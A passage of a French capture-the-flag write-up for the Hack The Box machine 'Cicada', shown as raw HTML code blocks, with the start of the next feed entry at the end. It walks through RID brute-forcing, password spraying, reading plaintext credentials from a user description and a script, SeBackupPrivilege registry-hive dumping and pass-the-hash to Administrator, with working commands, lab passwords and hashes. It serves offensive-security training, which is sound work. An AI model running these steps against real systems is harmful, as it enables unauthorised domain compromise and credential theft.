9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.11.35 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> -d <span class="s1">&#39;cicada.htb&#39;</span> --rid-brute </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>*<span class="o">]</span> Windows 10.0 Build <span class="m">20348</span> x64 <span class="o">(</span>name:CICADA-DC<span class="o">)</span> <span class="o">(</span>domain:cicada.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>+<span class="o">]</span> cicada.htb<span class="se">\g</span>uest: </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 498: CICADA<span class="se">\E</span>nterprise Read-only Domain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 500: CICADA<span class="se">\A</span>dministrator <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 501: CICADA<span class="se">\G</span>uest <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 502: CICADA<span class="se">\k</span>rbtgt <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 512: CICADA<span class="se">\D</span>omain Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 513: CICADA<span class="se">\D</span>omain Users <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 514: CICADA<span class="se">\D</span>omain Guests <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 515: CICADA<span class="se">\D</span>omain Computers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 516: CICADA<span class="se">\D</span>omain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 517: CICADA<span class="se">\C</span>ert Publishers <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 518: CICADA<span class="se">\S</span>chema Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 519: CICADA<span class="se">\E</span>nterprise Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 520: CICADA<span class="se">\G</span>roup Policy Creator Owners <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 521: CICADA<span class="se">\R</span>ead-only Domain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 522: CICADA<span class="se">\C</span>loneable Domain Controllers <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 525: CICADA<span class="se">\P</span>rotected Users <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 526: CICADA<span class="se">\K</span>ey Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 527: CICADA<span class="se">\E</span>nterprise Key Admins <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 553: CICADA<span class="se">\R</span>AS and IAS Servers <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 571: CICADA<span class="se">\A</span>llowed RODC Password Replication Group <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 572: CICADA<span class="se">\D</span>enied RODC Password Replication Group <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1000: CICADA<span class="se">\C</span>ICADA-DC$ <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1101: CICADA<span class="se">\D</span>nsAdmins <span class="o">(</span>SidTypeAlias<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1102: CICADA<span class="se">\D</span>nsUpdateProxy <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1103: CICADA<span class="se">\G</span>roups <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1104: CICADA<span class="se">\j</span>ohn.smoulder <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1105: CICADA<span class="se">\s</span>arah.dantelia <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1106: CICADA<span class="se">\m</span>ichael.wrightson <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1108: CICADA<span class="se">\d</span>avid.orelious <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1109: CICADA<span class="se">\D</span>ev Support <span class="o">(</span>SidTypeGroup<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC 1601: CICADA<span class="se">\e</span>mily.oscars <span class="o">(</span>SidTypeUser<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><p>On a donc une liste d&rsquo;utilisateur probable:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-php" data-lang="php"><span class="line"><span class="cl"><span class="nx">john</span><span class="o">.</span><span class="nx">smoulder</span> </span></span><span class="line"><span class="cl"><span class="nx">sarah</span><span class="o">.</span><span class="nx">dantelia</span> </span></span><span class="line"><span class="cl"><span class="nx">michael</span><span class="o">.</span><span class="nx">wrightson</span> </span></span><span class="line"><span class="cl"><span class="nx">david</span><span class="o">.</span><span class="nx">orelious</span> </span></span><span class="line"><span class="cl"><span class="nx">emily</span><span class="o">.</span><span class="nx">oscars</span> </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.11.35 -u users.txt -p <span class="s1">&#39;Cicada$M6Corpb*@Lp#nZp!8&#39;</span> -d <span class="s1">&#39;cicada.htb&#39;</span> --users </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>*<span class="o">]</span> Windows 10.0 Build <span class="m">20348</span> x64 <span class="o">(</span>name:CICADA-DC<span class="o">)</span> <span class="o">(</span>domain:cicada.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>-<span class="o">]</span> cicada.htb<span class="se">\j</span>ohn.smoulder:Cicada<span class="nv">$M6Corpb</span>*@Lp#nZp!8 STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>-<span class="o">]</span> cicada.htb<span class="se">\s</span>arah.dantelia:Cicada<span class="nv">$M6Corpb</span>*@Lp#nZp!8 STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>+<span class="o">]</span> cicada.htb<span class="se">\m</span>ichael.wrightson:Cicada<span class="nv">$M6Corpb</span>*@Lp#nZp!8 </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>*<span class="o">]</span> Trying to dump <span class="nb">local</span> users with SAMRPC protocol </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>+<span class="o">]</span> Enumerated domain user<span class="o">(</span>s<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC cicada.htb<span class="se">\A</span>dministrator Built-in account <span class="k">for</span> administering the computer/domain </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC cicada.htb<span class="se">\G</span>uest Built-in account <span class="k">for</span> guest access to the computer/domain </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC cicada.htb<span class="se">\k</span>rbtgt Key Distribution Center Service Account </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC cicada.htb<span class="se">\j</span>ohn.smoulder </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC cicada.htb<span class="se">\s</span>arah.dantelia </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC cicada.htb<span class="se">\m</span>ichael.wrightson </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC cicada.htb<span class="se">\d</span>avid.orelious Just in <span class="k">case</span> I forget my password is aRt<span class="nv">$Lp</span><span class="c1">#7t*VQ!3</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC cicada.htb<span class="se">\e</span>mily.oscars </span></span></code></pre></td></tr></table> </div> </div><p>On obtient un nouvel utilisateur ce qui nous donne deux comptes:</p> <p>michael.wrightson:<code>Cicada$M6Corpb*@Lp#nZp!8</code> david.orelious:<code>aRt$Lp#7t*VQ!3</code></p> <h3 id="smb-dev-share--david">SMB DEV share : david </h3><p>On observe que david.orelious a un acces au SMB <code>DEV</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nxc smb 10.10.11.35 -u <span class="s1">&#39;david.orelious&#39;</span> -p <span class="s1">&#39;aRt$Lp#7t*VQ!3&#39;</span> -d <span class="s1">&#39;cicada.htb&#39;</span> --shares </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>*<span class="o">]</span> Windows 10.0 Build <span class="m">20348</span> x64 <span class="o">(</span>name:CICADA-DC<span class="o">)</span> <span class="o">(</span>domain:cicada.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>+<span class="o">]</span> cicada.htb<span class="se">\d</span>avid.orelious:aRt<span class="nv">$Lp</span><span class="c1">#7t*VQ!3 </span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>*<span class="o">]</span> Enumerated shares </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC Share Permissions Remark </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC ----- ----------- ------ </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC ADMIN$ Remote Admin </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC C$ Default share </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC DEV READ </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC HR READ </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC IPC$ READ Remote IPC </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC NETLOGON READ Logon server share </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC SYSVOL READ Logon server share </span></span></code></pre></td></tr></table> </div> </div><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ smbclient //10.10.11.35/DEV -U <span class="s1">&#39;david.orelious&#39;</span> </span></span><span class="line"><span class="cl">Password <span class="k">for</span> <span class="o">[</span>WORKGROUP<span class="se">\d</span>avid.orelious<span class="o">]</span>: </span></span><span class="line"><span class="cl">Try <span class="s2">&#34;help&#34;</span> to get a list of possible commands. </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . D <span class="m">0</span> Thu Mar <span class="m">14</span> 08:31:39 <span class="m">2024</span> </span></span><span class="line"><span class="cl"> .. D <span class="m">0</span> Thu Mar <span class="m">14</span> 08:21:29 <span class="m">2024</span> </span></span><span class="line"><span class="cl"> Backup_script.ps1 A <span class="m">601</span> Wed Aug <span class="m">28</span> 13:28:22 <span class="m">2024</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">4168447</span> blocks of size 4096. <span class="m">403603</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> get Backup_script.ps1 </span></span><span class="line"><span class="cl">getting file <span class="se">\B</span>ackup_script.ps1 of size <span class="m">601</span> as Backup_script.ps1 <span class="o">(</span>3.1 KiloBytes/sec<span class="o">)</span> <span class="o">(</span>average 3.1 KiloBytes/sec<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><p>On a obtenu un script dans dev avec le mot de passe de <strong>emily.oscars</strong> en clair :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ cat Backup_script.ps1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$sourceDirectory</span> <span class="o">=</span> <span class="s2">&#34;C:\smb&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$destinationDirectory</span> <span class="o">=</span> <span class="s2">&#34;D:\Backup&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">$username</span> <span class="o">=</span> <span class="s2">&#34;emily.oscars&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$password</span> <span class="o">=</span> ConvertTo-SecureString <span class="s2">&#34;Q!3@Lp#M6b*7t*Vt&#34;</span> -AsPlainText -Force </span></span><span class="line"><span class="cl"><span class="nv">$credentials</span> <span class="o">=</span> New-Object System.Management.Automation.PSCredential<span class="o">(</span><span class="nv">$username</span>, <span class="nv">$password</span><span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="nv">$dateStamp</span> <span class="o">=</span> Get-Date -Format <span class="s2">&#34;yyyyMMdd_HHmmss&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$backupFileName</span> <span class="o">=</span> <span class="s2">&#34;smb_backup_</span><span class="nv">$dateStamp</span><span class="s2">.zip&#34;</span> </span></span><span class="line"><span class="cl"><span class="nv">$backupFilePath</span> <span class="o">=</span> Join-Path -Path <span class="nv">$destinationDirectory</span> -ChildPath <span class="nv">$backupFileName</span> </span></span><span class="line"><span class="cl">Compress-Archive -Path <span class="nv">$sourceDirectory</span> -DestinationPath <span class="nv">$backupFilePath</span> </span></span><span class="line"><span class="cl">Write-Host <span class="s2">&#34;Backup completed successfully. Backup file saved to: </span><span class="nv">$backupFilePath</span><span class="s2">&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Compte utilisateur: emily.oscars:<code>Q!3@Lp#M6b*7t*Vt</code></p> <h3 id="smb-admin-access--evil-winrm-user-flag">SMB ADMIN ACCESS / Evil-winrm (user flag) </h3><p>On observe que emily a des droits intéressants sur les shares SMB ADMIN$ et C$ :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.11.35 -u emily.oscars -p <span class="s1">&#39;Q!3@Lp#M6b*7t*Vt&#39;</span> -d <span class="s1">&#39;cicada.htb&#39;</span> --shares </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>*<span class="o">]</span> Windows 10.0 Build <span class="m">20348</span> x64 <span class="o">(</span>name:CICADA-DC<span class="o">)</span> <span class="o">(</span>domain:cicada.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>+<span class="o">]</span> cicada.htb<span class="se">\e</span>mily.oscars:Q!3@Lp#M6b*7t*Vt </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC <span class="o">[</span>*<span class="o">]</span> Enumerated shares </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC Share Permissions Remark </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC ----- ----------- ------ </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC ADMIN$ READ Remote Admin </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC C$ READ,WRITE Default share </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC DEV </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC HR READ </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC IPC$ READ Remote IPC </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC NETLOGON READ Logon server share </span></span><span class="line"><span class="cl">SMB 10.10.11.35 <span class="m">445</span> CICADA-DC SYSVOL READ Logon server share </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ smbclient //10.10.11.35/ADMIN$ -U <span class="s1">&#39;emily.oscars%Q!3@Lp#M6b*7t*Vt&#39;</span> </span></span><span class="line"><span class="cl"><span class="c1">##OR</span> </span></span><span class="line"><span class="cl">sudo apt install cifs-utils -y </span></span><span class="line"><span class="cl">sudo mount -t cifs //10.10.11.35/ADMIN$ /mnt/smb -o <span class="nv">username</span><span class="o">=</span><span class="s1">&#39;emily.oscars&#39;</span>,password<span class="o">=</span><span class="s1">&#39;Q!3@Lp#M6b*7t*Vt&#39;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ evil-winrm -i 10.10.11.35 -u emily.oscars -p <span class="s1">&#39;Q!3@Lp#M6b*7t*Vt&#39;</span> </span></span><span class="line"><span class="cl">$ <span class="nb">cd</span> Desktop </span></span><span class="line"><span class="cl">$ cat user.txt </span></span><span class="line"><span class="cl">5297.....2a75 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="enumeration-with-emilyoscars">Enumeration with emily.oscars </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\e</span>mily.oscars.CICADA<span class="se">\D</span>ocuments&gt; whoami /priv </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PRIVILEGES INFORMATION </span></span><span class="line"><span class="cl">---------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Privilege Name Description <span class="nv">State</span> </span></span><span class="line"><span class="cl"><span class="o">=============================</span> <span class="o">==============================</span> <span class="o">=======</span> </span></span><span class="line"><span class="cl">SeBackupPrivilege Back up files and directories Enabled </span></span><span class="line"><span class="cl">SeRestorePrivilege Restore files and directories Enabled </span></span><span class="line"><span class="cl">SeShutdownPrivilege Shut down the system Enabled </span></span><span class="line"><span class="cl">SeChangeNotifyPrivilege Bypass traverse checking Enabled </span></span><span class="line"><span class="cl">SeIncreaseWorkingSetPrivilege Increase a process working <span class="nb">set</span> Enabled </span></span></code></pre></td></tr></table> </div> </div><h3 id="exploit-sebackupprivilege">Exploit SeBackupPrivilege </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ reg save hklm<span class="se">\s</span>am . </span></span><span class="line"><span class="cl">$ reg save hklm<span class="se">\s</span>ystem . </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ pypykatz registry --sam sam.hive system.hive </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work </span></span><span class="line"><span class="cl">WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not <span class="nv">work</span> </span></span><span class="line"><span class="cl"><span class="o">==============</span> SYSTEM hive <span class="nv">secrets</span> <span class="o">==============</span> </span></span><span class="line"><span class="cl">CurrentControlSet: ControlSet001 </span></span><span class="line"><span class="cl">Boot Key: <span class="nv">3c2b033757a49110a9ee680b46e8d620</span> </span></span><span class="line"><span class="cl"><span class="o">==============</span> SAM hive <span class="nv">secrets</span> <span class="o">==============</span> </span></span><span class="line"><span class="cl">HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010 </span></span><span class="line"><span class="cl">Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341::: </span></span><span class="line"><span class="cl">Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl">WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ evil-winrm -i 10.10.11.35 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Evil-WinRM shell v3.5 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc<span class="o">()</span> <span class="k">function</span> is unimplemented on this machine </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Info: Establishing connection to remote endpoint </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>ocuments&gt; <span class="nb">cd</span> ../desktop </span></span><span class="line"><span class="cl">*Evil-WinRM* PS C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\d</span>esktop&gt; cat root.txt </span></span><span class="line"><span class="cl">e39c.....9300 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/administrator-htb/Sun, 01 Dec 2024 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/administrator-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Administrator cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> 